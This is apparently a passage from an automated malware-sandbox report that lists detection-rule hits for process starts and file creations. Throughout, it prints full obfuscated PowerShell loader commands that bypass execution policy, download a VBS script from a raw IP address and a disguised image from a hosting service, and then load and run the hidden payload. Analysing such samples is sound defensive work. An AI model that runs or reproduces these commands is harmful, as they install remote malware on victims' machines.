powershell.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\entiretimeneedgoodthingsforgetbackbestthingswithgoodnew.vbS" , ProcessId: 5548, ProcessName: wscript.exe
                      Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $corythosaurus = 'JGRlc3Rvb3IgPSAnaHR0cHM6Ly9yZXMuY2xvdWRpbmFyeS5jb20vZHp2YWk4NnVoL2ltYWdlL3VwbG9hZC92MTczNDA1MDk5MS91bnhhb29peWt4Zm13OXBhbjR6MS5qcGcgJzskbWFudWZhY3RvcnkgPSBOZXctT2JqZWN0IFN5c3RlbS5OZXQuV2ViQ2xpZW50OyRpbGlvdGliaWFsID0gJG1hbnVmYWN0b3J5LkRvd25sb2FkRGF0YSgkZGVzdG9vcik7JEJlbGxvYyA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKCRpbGlvdGliaWFsKTskbWlzcGVyY2VpdmVzID0gJzw8QkFTRTY0X1NUQVJUPj4nOyRvcmJpZm9sZCA9ICc8PEJBU0U2NF9FTkQ+Pic7JGh5c3Rlcm9pZCA9ICRCZWxsb2MuSW5kZXhPZigkbWlzcGVyY2VpdmVzKTskYWRkaXRpb25hbGl0eSA9ICRCZWxsb2MuSW5kZXhPZigkb3JiaWZvbGQpOyRoeXN0ZXJvaWQgLWdlIDAgLWFuZCAkYWRkaXRpb25hbGl0eSAtZ3QgJGh5c3Rlcm9pZDskaHlzdGVyb2lkICs9ICRtaXNwZXJjZWl2ZXMuTGVuZ3RoOyR3YWdnaW5zID0gJGFkZGl0aW9uYWxpdHkgLSAkaHlzdGVyb2lkOyRyZWNyZW1lbnRzID0gJEJlbGxvYy5TdWJzdHJpbmcoJGh5c3Rlcm9pZCwgJHdhZ2dpbnMpOyRHZW5ldmEgPSAtam9pbiAoJHJlY3JlbWVudHMuVG9DaGFyQXJyYXkoKSB8IEZvckVhY2gtT2JqZWN0IHsgJF8gfSlbLTEuLi0oJHJlY3JlbWVudHMuTGVuZ3RoKV07JGppbGxhcm9vcyA9IFtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoJEdlbmV2YSk7JHBvbXVtID0gW1N5c3RlbS5SZWZsZWN0aW9uLkFzc2VtYmx5XTo6TG9hZCgkamlsbGFyb29zKTskbG93ZG93biA9IFtkbmxpYi5JTy5Ib21lXS5HZXRNZXRob2QoJ1ZBSScpOyRsb3dkb3duLkludm9rZSgkbnVsbCwgQCgnMC84VjlycS9yL2VlLmV0c2FwLy86c3B0dGgnLCAnJGlzb21lcmljYWxseScsICckaXNvbWVyaWNhbGx5JywgJyRpc29tZXJpY2FsbHknLCAnQ2FzUG9sJywgJyRpc29tZXJpY2FsbHknLCAnJGlzb21lcmljYWxseScsJyRpc29tZXJpY2FsbHknLCckaXNvbWVyaWNhbGx5JywnJGlzb21lcmljYWxseScsJyRpc29tZXJpY2FsbHknLCckaXNvbWVyaWNhbGx5JywnMScsJyRpc29tZXJpY2FsbHknLCcnKSk7';$pycnaster = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($corythosaurus));Invoke-Expression $pycnaster, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $corythosaurus = 'JGRlc3Rvb3IgPSAnaHR0cHM6Ly9yZXMuY2xvdWRpbmFyeS5jb20vZHp2YWk4NnVoL2ltYWdlL3VwbG9hZC92MTczNDA1MDk5MS91bnhhb29peWt4Zm13OXBhbjR6MS5qcGcgJzskbWFudWZhY3RvcnkgPSBOZXctT2JqZWN0IFN5c3RlbS5OZXQuV2ViQ2xpZW50OyRpbGlvdGliaWFsID0gJG1hbnVmYWN0b3J5LkRvd25sb2FkRGF0YSgkZGVzdG9vcik7JEJlbGxvYyA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKCRpbGlvdGliaWFsKTskbWlzcGVyY2VpdmVzID0gJzw8QkFTRTY0X1NUQVJUPj4nOyRvcmJpZm9sZCA9ICc8PEJBU0U2NF9FTkQ+Pic7JGh5c3Rlcm9pZCA9ICRCZWxsb2MuSW5kZXhPZigkbWlzcGVyY2VpdmVzKTskYWRkaXRpb25hbGl0eSA9ICRCZWxsb2MuSW5kZXhPZigkb3JiaWZvbGQpOyRoeXN0ZXJvaWQgLWdlIDAgLWFuZCAkYWRkaXRpb25hbGl0eSAtZ3QgJGh5c3Rlcm9pZDskaHlzdGVyb2lkICs9ICRtaXNwZXJjZWl2ZXMuTGVuZ3RoOyR3YWdnaW5zID0gJGFkZGl0aW9uYWxpdHkgLSAkaHlzdGVyb2lkOyRyZWNyZW1lbnRzID0gJEJlbGxvYy5TdWJzdHJpbmcoJGh5c3Rlcm9pZCwgJHdhZ2dpbnMpOyRHZW5ldmEgPSAtam9pbiAoJHJlY3JlbWVudHMuVG9DaGFyQXJyYXkoKSB8IEZvckVhY2gtT2JqZWN0IHsgJF8gfSlbLTEuLi0oJHJlY3JlbWVudHMuTGVuZ3RoKV07JGppbGxhcm9vcyA9IFtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoJEdlbmV2YSk7JHBvbXVtID0gW1N5c3RlbS5SZWZsZWN0aW9uLkFzc2VtYmx5XTo6TG9hZCgkamlsbGFyb29zKTskbG93ZG93biA9IFtkbmxpYi5JTy5Ib21lXS5HZXRNZXRob2QoJ1ZBSScpOyRsb3dkb3duLkludm9rZSgkbnVsbCwgQCgnMC84VjlycS9yL2VlLmV0c2FwLy86c3B0dGgnLCAnJGlzb21lcmljYWxs
                      Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\system32\cmd.exe" "/C PoWErsHeLL -ex bYpaSs -nOP -w 1 -C DEvICECRedentiALdePLOYmEnt ; INvOke-exPrEssIOn($(inVOKe-exPressioN('[sYSTEm.teXT.EnCOdInG]'+[CHAR]58+[cHAR]58+'utf8.gETstrInG([sYsTem.CoNVErt]'+[chaR]58+[Char]58+'fROmbASe64StRiNg('+[cHaR]34+'JEdFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYURkLVRZUEUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1lbWJFcmRFZmluaVRJb04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVyTG1vbi5kbEwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIElETWtQbkcsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIERsaCxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgdHgsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBTVCxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgUUFrKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uQU1lICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJ6dyIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hbUVzcGFjRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBkRWFPICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJEdFOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTkyLjMuMTIyLjE1OS80Ny9lbnRpcmV0aW1lbmVlZGdvb2R0aGluZ3Nmb3JnZXRiYWNrYmVzdHRoaW5nc3dpdGhnb29kbmV3c2Zvci50SUYiLCIkRW5WOkFQUERBVEFcZW50aXJldGltZW5lZWRnb29kdGhpbmdzZm9yZ2V0YmFja2Jlc3R0aGluZ3N3aXRoZ29vZG5ldy52YlMiLDAsMCk7c3RBUnQtU0xlZVAoMyk7SU52T2tlLUVYcHJlc3NJT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRlblY6QVBQREFUQVxlbnRpcmV0aW1lbmVlZGdvb2R0aGluZ3Nmb3JnZXRiYWNrYmVzdHRoaW5nc3dpdGhnb29kbmV3LnZiUyI='+[cHar]0X22+'))')))", CommandLine: "C:\Windows\system32\cmd.exe" "/C PoWErsHeLL -ex bYpaSs -nOP -w 1 -C DEvICECRedentiALdePLOYmEnt ; INvOke-exPrEssIOn($(inVOKe-exPressioN('[sYSTEm.teXT.EnCOdInG]'+[CHAR]58+[cHAR]58+'utf8.gETstrInG([sYsTem.CoNVErt]'+[chaR]58+[Char]58+'fROmbASe64StRiNg('+[cHaR]34+'JEdFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYURkLVRZUEUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1lbWJFcmRFZmluaVRJb04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVyTG1vbi5kbEwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIElETWtQbkcsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIERsaCxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgdHgsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBTVCxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA
                      Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\entiretimeneedgoodthingsforgetbackbestthingswithgoodnew.vbS" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\entiretimeneedgoodthingsforgetbackbestthingswithgoodnew.vbS" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: PoWErsHeLL -ex bYpaSs -nOP -w 1 -C DEvICECRedentiALdePLOYmEnt ; INvOke-exPrEssIOn($(inVOKe-exPressioN('[sYSTEm.teXT.EnCOdInG]'+[CHAR]58+[cHAR]58+'utf8.gETstrInG([sYsTem.CoNVErt]'+[chaR]58+[Char]58+'fROmbASe64StRiNg('+[cHaR]34+'JEdFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYURkLVRZUEUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1lbWJFcmRFZmluaVRJb04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVyTG1vbi5kbEwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIElETWtQbkcsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIERsaCxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgdHgsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBTVCxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgUUFrKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uQU1lICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJ6dyIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hbUVzcGFjRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBkRWFPICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJEdFOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTkyLjMuMTIyLjE1OS80Ny9lbnRpcmV0aW1lbmVlZGdvb2R0aGluZ3Nmb3JnZXRiYWNrYmVzdHRoaW5nc3dpdGhnb29kbmV3c2Zvci50SUYiLCIkRW5WOkFQUERBVEFcZW50aXJldGltZW5lZWRnb29kdGhpbmdzZm9yZ2V0YmFja2Jlc3R0aGluZ3N3aXRoZ29vZG5ldy52YlMiLDAsMCk7c3RBUnQtU0xlZVAoMyk7SU52T2tlLUVYcHJlc3NJT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRlblY6QVBQREFUQVxlbnRpcmV0aW1lbmVlZGdvb2R0aGluZ3Nmb3JnZXRiYWNrYmVzdHRoaW5nc3dpdGhnb29kbmV3LnZiUyI='+[cHar]0X22+'))')))", ParentImage: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 6500, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\entiretimeneedgoodthingsforgetbackbestthingswithgoodnew.vbS" , ProcessId: 5548, ProcessName: wscript.exe
                      Source: Process startedAuthor: Florian Roth (Nextron Systems), X__Junior (Nextron Systems): Data: Command: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\brz1t20s\brz1t20s.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\brz1t20s\brz1t20s.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, ParentCommandLine: PoWErsHeLL -ex bYpaSs -nOP -w 1 -C DEvICECRedentiALdePLOYmEnt ; INvOke-exPrEssIOn($(inVOKe-exPressioN('[sYSTEm.teXT.EnCOdInG]'+[CHAR]58+[cHAR]58+'utf8.gETstrInG([sYsTem.CoNVErt]'+[chaR]58+[Char]58+'fROmbASe64StRiNg('+[cHaR]34+'JEdFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYURkLVRZUEUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1lbWJFcmRFZmluaVRJb04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVyTG1vbi5kbEwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIElETWtQbkcsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIERsaCxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgdHgsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBTVCxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgUUFrKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uQU1lICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJ6dyIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hbUVzcGFjRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBkRWFPICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJEdFOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTkyLjMuMTIyLjE1OS80Ny9lbnRpcmV0aW1lbmVlZGdvb2R0aGluZ3Nmb3JnZXRiYWNrYmVzdHRoaW5nc3dpdGhnb29kbmV3c2Zvci50SUYiLCIkRW5WOkFQUERBVEFcZW50aXJldGltZW5lZWRnb29kdGhpbmdzZm9yZ2V0YmFja2Jlc3R0aGluZ3N3aXRoZ29vZG5ldy52YlMiLDAsMCk7c3RBUnQtU0xlZVAoMyk7SU52T2tlLUVYcHJlc3NJT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRlblY6QVBQREFUQVxlbnRpcmV0aW1lbmVlZGdvb2R0aGluZ3Nmb3JnZXRiYWNrYmVzdHRoaW5nc3dpdGhnb29kbmV3LnZiUyI='+[cHar]0X22+'))')))", ParentImage: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 6500, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\brz1t20s\brz1t20s.cmdline", ProcessId: 1848, ProcessName: csc.exe
                      Source: File createdAuthor: frack113, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 6500, TargetFilename: C:\Users\user\AppData\Roaming\entiretimeneedgoodthingsforgetbackbestthingswithgoodnew.vbS
                      Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\entiretimeneedgoodthingsforgetbackbestthingswithgoodnew.vbS" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\entiretimeneedgoodthingsforgetbackbestthingswithgoodnew.vbS" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: PoWErsHeLL -ex bYpaSs -nOP -w 1 -C DEvICECRedentiALdePLOYmEnt ; INvOke-exPrEssIOn($(inVOKe-exPressioN('[sYSTEm.teXT.EnCOdInG]'+[CHAR]58+[cHAR]58+'utf8.gETstrInG([sYsTem.CoNVErt]'+[chaR]58+[Char]58+'fROmbASe64StRiNg('+[cHaR]34+'JEdFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYURkLVRZUEUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1lbWJFcmRFZmluaVRJb04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVyTG1vbi5kbEwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIElETWtQbkcsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIERsaCxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgdHgsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBTVCxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgUUFrKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uQU1lICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJ6dyIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hbUVzcGFjRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBkRWFPICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJEdFOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTkyLjMuMTIyLjE1OS80Ny9lbnRpcmV0aW1lbmVlZGdvb2R0aGluZ3Nmb3JnZXRiYWNrYmVzdHRoaW5nc3dpdGhnb29kbmV3c2Zvci50SUYiLCIkRW5WOkFQUERBVEFcZW50aXJldGltZW5lZWRnb29kdGhpbmdzZm9yZ2V0YmFja2Jlc3R0aGluZ3N3aXRoZ29vZG5ldy52YlMiLDAsMCk7c3RBUnQtU0xlZVAoMyk7SU52T2tlLUVYcHJlc3NJT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRlblY6QVBQREFUQVxlbnRpcmV0aW1lbmVlZGdvb2R0aGluZ3Nmb3JnZXRiYWNrYmVzdHRoaW5nc3dpdGhnb29kbmV3LnZiUyI='+[cHar]0X22+'))')))", ParentImage: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 6500, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\entiretimeneedgoodthingsforgetbackbestthingswithgoodnew.vbS" , ProcessId: 5548, ProcessName: wscript.exe
                      Source: File createdAuthor: frack113: Data: EventID: 11, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 6500, TargetFilename: C:\Users\user\AppData\Local\Temp\brz1t20s\brz1t20s.cmdline
                      Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: PoWErsHeLL -ex bYpaSs -nOP -w 1 -C DEvICECRedentiALdePLOYmEnt ; INvOke-exPrEssIOn($(inVOKe-exPressioN('[sYSTEm.teXT.EnCOdInG]'+[CHAR]58+[cHAR]58+'utf8.gETstrInG([sYsTem.CoNVErt]'+[chaR]58+[Char]58+'fROmbASe64StRiNg('+[cHaR]34+'JEdFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYURkLVRZUEUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1lbWJFcmRFZmluaVRJb04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVyTG1vbi5kbEwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIElETWtQbkcsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIERsaCxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgdHgsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBTVCxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgUUFrKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uQU1lICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJ6dyIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hbUVzcGFjRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBkRWFPICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJEdFOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTkyLjMuMTIyLjE1OS80Ny9lbnRpcmV0aW1lbmVlZGdvb2R0aGluZ3Nmb3JnZXRiYWNrYmVzdHRoaW5nc3dpdGhnb29kbmV3c2Zvci50SUYiLCIkRW5WOkFQUERBVEFcZW50aXJldGltZW5lZWRnb29kdGhpbmdzZm9yZ2V0YmFja2Jlc3R0aGluZ3N3aXRoZ29vZG5ldy52YlMiLDAsMCk7c3RBUnQtU0xlZVAoMyk7SU52T2tlLUVYcHJlc3NJT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRlblY6QVBQREFUQVxlbnRpcmV0aW1lbmVlZGdvb2R0aGluZ3Nmb3JnZXRiYWNrYmVzdHRoaW5nc3dpdGhnb29kbmV3LnZiUyI='+[cHar]0X22+'))')))", CommandLine: PoWErsHeLL -ex bYpaSs -nOP -w 1 -C DEvICECRedentiALdePLOYmEnt ; INvOke-exPrEssIOn($(inVOKe-exPressioN('[sYSTEm.teXT.EnCOdInG]'+[CHAR]58+[cHAR]58+'utf8.gETstrInG([sYsTem.CoNVErt]'+[chaR]58+[Char]58+'fROmbASe64StRiNg('+[cHaR]34+'JEdFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYURkLVRZUEUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1lbWJFcmRFZmluaVRJb04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVyTG1vbi5kbEwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIElETWtQbkcsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIERsaCxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgdHgsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBTVCxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgUUFrKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uQU1lICAgI

                      Data Obfuscation

                      barindex
                      Source: Process startedAuthor: Joe Security: Data: Command: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\brz1t20s\brz1t20s.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\brz1t20s\brz1t20s.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, ParentCommandLine: PoWErsHeLL -ex bYpaSs -nOP -w 1 -C DEvICECRedentiALdePLOYmEnt ; INvOke-exPrEssIOn($(inVOKe-exPressioN('[sYSTEm.teXT.EnCOdInG]'+[CHAR]58+[cHAR]58+'utf8.gETstrInG([sYsTem.CoNVErt]'+[chaR]58+[Char]58+'fROmbASe64StRiNg('+[cHaR]34+'JEdFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYURkLVRZUEUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1lbWJFcmRFZmluaVRJb04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVyTG1vbi5kbEwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIElETWtQbkcsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIERsaCxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgdHgsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBTVCxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgUUFrKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uQU1lICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJ6dyIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hbUVzcGFjRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBkRWFPICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJEdFOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTkyLjMuMTIyLjE1OS80Ny9lbnRpcmV0aW1lbmVlZGdvb2R0aGluZ3Nmb3JnZXRiYWNrYmVzdHRoaW5nc3dpdGhnb